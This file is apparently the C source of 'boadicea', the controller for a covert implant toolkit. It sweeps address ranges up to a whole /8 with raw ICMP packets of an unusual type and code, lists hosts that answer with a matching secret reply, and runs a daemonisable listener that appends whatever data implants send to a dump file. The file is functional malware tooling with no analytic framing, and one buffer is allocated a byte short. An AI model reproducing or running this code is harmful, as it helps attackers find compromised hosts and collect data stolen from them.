#include <aldebaran.h>


int make_server(int);
void usage();
void scan(char*);
void client_mode(char*, int);
void* receive_answers(void*);
void send_request(char*);

int sockfd;

int main(int argc, char* argv[]){

int c;
int port=0;
char* file=NULL;

    if(argc==1)
	usage();
	
    while((c=getopt(argc, argv, "q:f:p:d"))!=EOF){
	
	switch(c){
	    
	case 'q':
	
	    sockfd=Socket(AF_INET, SOCK_RAW, IPPROTO_ICMP);
	    scan(optarg);
	break;
	
	case 'f':
	    file=(char*)Malloc(strlen(optarg));
	    strcpy(file, optarg);
	break;
	
	case 'p':
	    port=atoi(optarg);
	break;
	
	case 'd':
	    
	    switch(fork()){
		case 0:
		    setsid();
		break;
		
		case (-1):
		    perror("Fork");
		    exit(1);
		break;
		
		default:
		    exit(0);
		break;
		}
	break;
    }
}    
	if(port!=0 && file!=NULL)
	    client_mode(file, port);
	else
	    usage();
	    
	exit(0);
}

void client_mode(char* file, int port){

FILE* dump_file;
int sockfd, n;
char bufor[5000];

	umask(066);
	dump_file=Fopen(file, "a");
	printf("Using file: %s\n", file);
	
	sockfd=make_server(port);
	
	while(1){
		
	n=Read(sockfd, bufor, 5000);
	Fwrite(bufor, 1, n, dump_file);
	bzero(bufor, 5000);
	}

return;
}

void usage(){
    printf("Usage: ./boadicea [-f file_name] [-p port_number] [-q query_ip/network]\n");
    exit(1);
}

void scan(char* ip){

pthread_t blah;
int a,b,c,d,f,g,h;
int ret;
char address[40];    	    
    
    pthread_create(&blah, NULL, receive_answers, NULL);
    ret=sscanf(ip, "%d.%d.%d.%d", &a, &b, &c, &d);
    
    switch(ret){
	
	case 1:
	
		for(f=1;f<256;f++)
		    for(g=1;g<256;g++)
			for(h=1;h<255;h++){
			    sprintf(address, "%d.%d.%d.%d", a, f, g, h);
			    send_request(address);
			    }
	break;
	
	case 2:
	
		    for(g=1;g<256;g++)
			for(h=1;h<255;h++){
			    sprintf(address, "%d.%d.%d.%d", a, b, g, h);
			    send_request(address);
			    }
	break;
	
	case 3:
	
		for(h=1;h<255;h++){
			sprintf(address, "%d.%d.%d.%d", a, b, c, h);
			send_request(address);
			    }    
	break;
			    
	case 4:
		sprintf(address, "%d.%d.%d.%d", a, b, c, d);
		send_request(address);
	break;
	
	default:
	    printf("Bad IP!\n");
	    exit(1);
	break;
	}
sleep(4);
exit(0);	
}

void send_request(char* ip){

struct icmphdr icmph;
struct sockaddr_in sa;
    
    bzero(&icmph, sizeof(struct icmphdr));    
    icmph.type=222;
    icmph.code=222;
    icmph.checksum=0;

    sa.sin_addr.s_addr=inet_addr(ip);
    sa.sin_family=AF_INET;
    
    Sendto(sockfd, &icmph, sizeof(struct icmphdr), 0,(struct sockaddr*) &sa, sizeof(sa));

return;
}

void* receive_answers(void* blah){

struct icmphdr* icmph;
struct iphdr* iph;
char bufor[1000];
struct sockaddr_in sa;
int salen;

    
    while(1){
	    
	Recvfrom(sockfd, bufor, 1000, 0,(struct sockaddr*) &sa, &salen);
	iph=(struct iphdr*)(bufor);
	icmph=(struct icmphdr*)(bufor+(iph->ihl*4));
	
	    if(icmph->type==111 && icmph->code==111)
		printf("%s:%s\n\n", inet_ntoa(sa.sin_addr), (bufor+(iph->ihl*4)+sizeof(struct icmphdr)));
	bzero(bufor, 1000);	
	}
	
return NULL;
}
			     	
